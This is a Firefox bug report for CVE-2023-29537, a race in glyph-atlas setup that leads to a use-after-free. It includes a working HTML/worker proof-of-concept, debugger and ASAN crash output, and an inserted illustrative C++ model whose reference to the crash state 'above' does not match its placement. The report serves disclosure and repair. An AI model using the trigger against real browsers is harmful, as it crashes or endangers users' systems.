Closed Bug 1823365 (CVE-2023-29537) Opened 11 months ago Closed 11 months ago

initialization race leading to use after free in MakeGlyphAtlas()

Categories

(Core :: Graphics: Text, defect)

Firefox 113
defect

Tracking

VERIFIED FIXED
113 Branch
Tracking Status
firefox-esr102 --- unaffected
firefox111 --- wontfix
firefox112 + verified
firefox113 + verified

People

(Reporter: loobenyang, Assigned: jfkthame)

References

(Regressed 1 open bug)

Details

(Keywords: csectype-race, sec-high, testcase, Whiteboard: [adv-main112+])

Attachments

(6 files)

VULNERABILITY DETAILS
A specially crafted HTML file can trigger a use-after-free in the GFX function MakeGlyphAtlas(). This bug can potentially be exploited to achieve one-click remote code execution in the content process.

gGlyphMask is a static variable in gfxFontMissingGlyphs.cpp, so it is intended to be initialized/constructed only once.

	static RefPtr<SourceSurface> gGlyphMask;

However, the code inside the function MakeGlyphAtlas() in gfxFontMissingGlyphs.cpp is subject to a race condition.

	static bool MakeGlyphAtlas(const DeviceColor& aColor) {
	...
	  if (!gGlyphMask) {
	    gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
	...
	}

When a JS call such as ctx0.fillText("&#9175;&#9856;&cent;") from the PoC is made from a web worker, MakeGlyphAtlas() is executed on the worker thread.

If two threads check gGlyphMask while it is null in both cases, both satisfy the if (!gGlyphMask) condition, and both call CreateSourceSurfaceFromData() to create a new SourceSurfaceSkia object and assign it to the RefPtr gGlyphMask. One thread executes CreateSourceSurfaceFromData() sooner and creates a SourceSurfaceSkia object first. When the second thread then executes CreateSourceSurfaceFromData() and assigns its newly created second SourceSurfaceSkia object to gGlyphMask, gGlyphMask is no longer null (unlike at the time of its null check), so the assignment ("=") releases the first SourceSurfaceSkia object.

After that, when the first thread continues with the subsequent code, its operations on gGlyphMask are a use-after-free:

	gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
	                              DrawOptions(1.0f, CompositionOp::OP_SOURCE));
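The interleaving described above, replayed deterministically in a small model, next to a race-free lazy initializer. This is an added example and not Gecko code: Surface stands in for SourceSurfaceSkia, gRacyMask and gSafeMask stand in for gGlyphMask, and the std::call_once plus local-strong-reference remedy is a generic fix chosen for illustration, not a description of the patch that landed for this bug.

```cpp
// Added example (not Gecko code): model of the racy lazy-init pattern in
// MakeGlyphAtlas() and one race-free alternative. All names are hypothetical.
#include <atomic>
#include <cstdio>
#include <memory>
#include <mutex>
#include <thread>
#include <vector>

// Stand-in for SourceSurfaceSkia. Counts constructions and destructions so a
// test can detect a double construction or a premature release.
struct Surface {
  static std::atomic<int> constructed;
  static std::atomic<int> destroyed;
  int payload = 42;
  Surface() { ++constructed; }
  ~Surface() { ++destroyed; payload = -1; }  // poison, like a freed-memory fill
};
std::atomic<int> Surface::constructed{0};
std::atomic<int> Surface::destroyed{0};

// Racy global, mirroring gGlyphMask: the null check and the assignment are
// not atomic with respect to other threads, and callers use the global
// directly instead of a reference they own.
static std::shared_ptr<Surface> gRacyMask;

// Deterministic single-thread replay of the interleaving from the report, so
// the mechanism is observable without undefined behaviour. A's view of the
// object is a weak_ptr rather than a raw pointer so expiry can be checked.
// Returns true when the object thread A still intends to use has been freed.
bool ReplayRacyInterleaving() {
  gRacyMask.reset();
  Surface::constructed = 0;
  Surface::destroyed = 0;
  // Step 1: both threads evaluate `!gRacyMask` while it is still null.
  bool aSeesNull = !gRacyMask;
  bool bSeesNull = !gRacyMask;
  // Step 2: thread A creates the first surface and assigns it.
  if (aSeesNull) gRacyMask = std::make_shared<Surface>();
  // Thread A goes on to use the global directly (as MaskSurface() does).
  std::weak_ptr<Surface> aView = gRacyMask;
  // Step 3: thread B creates the second surface; the assignment releases A's.
  if (bSeesNull) gRacyMask = std::make_shared<Surface>();
  // Step 4: thread A continues; the object it was about to use is gone.
  return aView.expired() && Surface::constructed == 2 && Surface::destroyed == 1;
}

// Race-free alternative: std::call_once guarantees exactly one construction,
// and every caller takes its own strong reference before touching the object,
// so a later reassignment could not free it out from under the caller.
static std::shared_ptr<Surface> gSafeMask;
static std::once_flag gSafeMaskOnce;

static std::shared_ptr<Surface> GetSafeMask() {
  std::call_once(gSafeMaskOnce, [] { gSafeMask = std::make_shared<Surface>(); });
  return gSafeMask;  // the copy is the caller's own strong reference
}

// One worker: fetch the mask `iters` times and verify it is alive each time.
static bool SafeWorker(int iters) {
  for (int i = 0; i < iters; ++i) {
    std::shared_ptr<Surface> mask = GetSafeMask();
    if (!mask || mask->payload != 42) return false;
  }
  return true;
}

// Runs `nthreads` workers concurrently. Returns true if every worker only ever
// saw a live object, exactly one Surface was constructed and none destroyed.
// (Call once per process: the once_flag cannot be re-armed.)
bool StressSafeInit(int nthreads, int iters) {
  Surface::constructed = 0;
  Surface::destroyed = 0;
  std::vector<std::thread> threads;
  std::vector<int> ok(nthreads, 0);
  for (int t = 0; t < nthreads; ++t)
    threads.emplace_back([&, t] { ok[t] = SafeWorker(iters) ? 1 : 0; });
  for (auto& th : threads) th.join();
  for (int v : ok) if (!v) return false;
  return Surface::constructed == 1 && Surface::destroyed == 0;
}

int main() {
  std::printf("racy replay frees thread A's object: %s\n",
              ReplayRacyInterleaving() ? "yes" : "no");
  std::printf("call_once init survives 8 threads: %s\n",
              StressSafeInit(8, 1000) ? "yes" : "no");
  return 0;
}
```

The replay isolates the two independent defects the report describes: the unsynchronized check-then-assign on a shared static, which allows two constructions, and the caller's use of the global itself rather than a reference it holds, which is what turns the second assignment into a free of an object still in use. Either fix alone narrows the window; the safe accessor applies both. The rax=e5e5e5e5e5e5e5e5 in the crash state above is consistent with that second defect: Firefox's allocator fills freed memory with 0xe5, so a read through a pointer loaded from freed memory produces exactly that pattern.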

VERSION
Firefox 113.0a1 (2023-03-19) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1413)

REPRODUCTION CASE (UAF_MakeGlyphAtlas_PoC.html)

<script>
workers = [];
workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;&cent;",  47,15);}, 2);\n'
workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;&cent;",  47,15);}, 1);\n'

for(var i = 0; i < 10; i++)
{
	var blob = new Blob([workerCode],{type: "text/javascript"});
	workers[i] = new Worker(window.URL.createObjectURL(blob));
}

setTimeout(function(){location.reload();},300);
</script>

Type of crash: content process
Crash State:

(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> r
rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
r14=000000ffebb7ac20 r15=000000ffebb7adc0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
xul!mozilla::gfx::GetSkImageForSurface+0x36:
00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
9:318> dv
	   aSurface = 0x000002d6`3522d800
		  aLock = 0x000000ff`ebb7ac10 Nothing
		aBounds = <value unavailable>
		aMatrix = <value unavailable>
			map = struct mozilla::gfx::DataSourceSurface::MappedSurface
		 pixmap = class SkPixmap
		  image = class sk_sp<SkImage>
	dataSurface = <value unavailable>
	releaseProc = <value unavailable>
		   surf = <value unavailable>
9:318> k
 # Child-SP          RetAddr           Call Site
00 000000ff`ebb7aa50 00007ff9`d177638c xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246] 
01 (Inline Function) --------`-------- xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460] 
02 000000ff`ebb7abd0 00007ff9`d18d527e xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441] 
03 (Inline Function) --------`-------- xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112] 
04 (Inline Function) --------`-------- xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131] 
05 000000ff`ebb7ad70 00007ff9`d18c062a xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418] 
06 000000ff`ebb7aef0 00007ff9`d0b29ef9 xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202] 
07 (Inline Function) --------`-------- xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030] 
08 000000ff`ebb7b050 00007ff9`d0a177b9 xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530] 
09 (Inline Function) --------`-------- xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429] 
0a 000000ff`ebb7bb10 00007ff9`d22906e6 xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683] 
0b 000000ff`ebb7cbf0 00007ff9`d2f4defc xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124] 
0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390] 
0d 000000ff`ebb7cf80 00007ff9`d224b3cf xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165] 
0e 000000ff`ebb7d140 00007ff9`d224a72a xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448] 
0f 000000ff`ebb7d400 00007ff9`d1c9c15a xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863] 
10 000000ff`ebb7d440 00007ff9`d0831055 xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904] 
11 000000ff`ebb7d5a0 00007ff9`d0eb9e19 xul!mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions>+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318] 
12 (Inline Function) --------`-------- xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459] 
13 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553] 
14 (Inline Function) --------`-------- xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
15 (Inline Function) --------`-------- xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625] 
16 000000ff`ebb7d660 00007ff9`d08a0a55 xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368] 
17 (Inline Function) --------`-------- xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431] 
18 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585] 
19 (Inline Function) --------`-------- xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
1a 000000ff`ebb7db20 00007ff9`d094ab9f xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652] 
1b 000000ff`ebb7dc30 00007ff9`cf260440 xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117] 
1c 000000ff`ebb7dd60 00007ff9`cfba8d05 xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50] 
1d (Inline Function) --------`-------- xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71] 
1e 000000ff`ebb7dec0 00007ff9`d2b86376 xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167] 
1f 000000ff`ebb7e1a0 00007ff9`cf0da944 xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163] 
20 000000ff`ebb7e330 00007ff9`cf782505 xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
21 (Inline Function) --------`-------- xul!nsTimerImpl::Fire::<lambda_2>::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656] 
22 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,1,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309] 
23 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318] 
24 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902] 
25 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857] 
26 000000ff`ebb7e4d0 00007ff9`cf773b73 xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654] 
27 000000ff`ebb7e660 00007ff9`d2b8c62a xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469] 
28 000000ff`ebb7e840 00007ff9`cf0da944 xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201] 
29 000000ff`ebb7e8a0 00007ff9`d07d9dce xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
2a 000000ff`ebb7ea40 00007ff9`d07eeb9e xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
2b 000000ff`ebb7ede0 00007ff9`cf0da19c xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
2c 000000ff`ebb7ee30 00007ff9`cfeabbe2 xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281] 
2d 000000ff`ebb7ef30 00007ff9`d07d9dce xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049] 
2e 000000ff`ebb7f0c0 00007ff9`d07d8985 xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
2f (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
30 000000ff`ebb7f460 00007ff9`cf93340f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
31 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381] 
32 000000ff`ebb7f510 00007ff9`cef5fc7e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375] 
33 000000ff`ebb7f560 00007ff9`cf775f03 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357] 
34 000000ff`ebb7f5c0 00007ffa`0ebc577c xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393] 
35 000000ff`ebb7f780 00007ffa`0ec4a411 nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
36 000000ff`ebb7f800 00007ffa`5c849363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
37 000000ff`ebb7f830 00007ffa`5dc626bd ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
38 000000ff`ebb7f860 00007ffa`1f6251c8 KERNEL32!BaseThreadInitThunk+0x1d
39 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
3a 000000ff`ebb7f890 00007ffa`5ecca9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592] 
3b 000000ff`ebb7f900 00000000`00000000 ntdll!RtlUserThreadStart+0x28
9:318> dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
	[+0x008] mWeakRef         [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
	[+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
9:318> dx -id 0,9 -r1 (*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))
(*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))                 [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
	[+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
9:318> dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
	[+0x000] mRefCnt          [Type: mozilla::detail::RC<unsigned long long,0>]
	[+0x008] mStrongCnt       [Type: mozilla::detail::RC<unsigned long long,0>]
	[+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5

CREDIT INFORMATION
Reporter credit: Looben Yang

I also ran the PoC on the official Firefox ASAN build. Here is the ASAN report to make your assessment easier:

113.0a1 (2023-03-19) (64-bit)

=================================================================
==18340==ERROR: AddressSanitizer: heap-use-after-free on address 0x12709a7ebec0 at pc 0x7ff9b892b6ca bp 0x00ff60bf4d20 sp 0x00ff60bf4d68
READ of size 8 at 0x12709a7ebec0 thread T26
    #0 0x7ff9b892b6c9 in mozilla::gfx::GetSkImageForSurface /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:246
    #1 0x7ff9b89373fb in mozilla::gfx::DrawTargetSkia::MaskSurface /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:1441
    #2 0x7ff9b923c31e in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
    #3 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #4 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #5 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #6 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #7 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #8 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #9 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #10 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
    #11 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #12 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #13 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #14 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #15 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #16 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #17 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #18 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #19 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #20 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #21 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #22 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #23 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #24 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #25 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #26 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469
    #27 0x7ff9bfb9bbe0 in mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:201
    #28 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #29 0x7ff9b687938d in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1233
    #30 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #31 0x7ff9bfb64d64 in mozilla::dom::WorkerPrivate::DoRunLoop /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:3279
    #32 0x7ff9bfb385c8 in mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2043
    #33 0x7ff9b687938d in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1233
    #34 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #35 0x7ff9b7f3150e in mozilla::ipc::MessagePumpForNonMainThreads::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #36 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #37 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #38 0x7ff9b686ed3c in nsThread::ThreadFunc /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391
    #39 0x7ff9d5c152c5 in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #40 0x7ff9d5beedab in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #41 0x7ffa5c849362 in recalloc+0xa2 (C:\WINDOWS\System32\ucrtbase.dll+0x180029362)
    #42 0x7ff9d5feabb3 in __asan::AsanThread::ThreadStart /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_thread.cpp:277
    #43 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #44 0x7ffa21bba5ae in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp:592
    #45 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

0x12709a7ebec0 is located 0 bytes inside of 128-byte region [0x12709a7ebec0,0x12709a7ebf40)
freed by thread T32 here:
    #0 0x7ff9d5fdeeec in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ff9b8a255ec in mozilla::gfx::SourceSurfaceSkia::~SourceSurfaceSkia /builds/worker/checkouts/gecko/gfx/2d/SourceSurfaceSkia.cpp:25
    #2 0x7ff9b923c1a4 in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
    #3 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #4 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #5 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #6 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #7 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #8 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #9 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #10 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
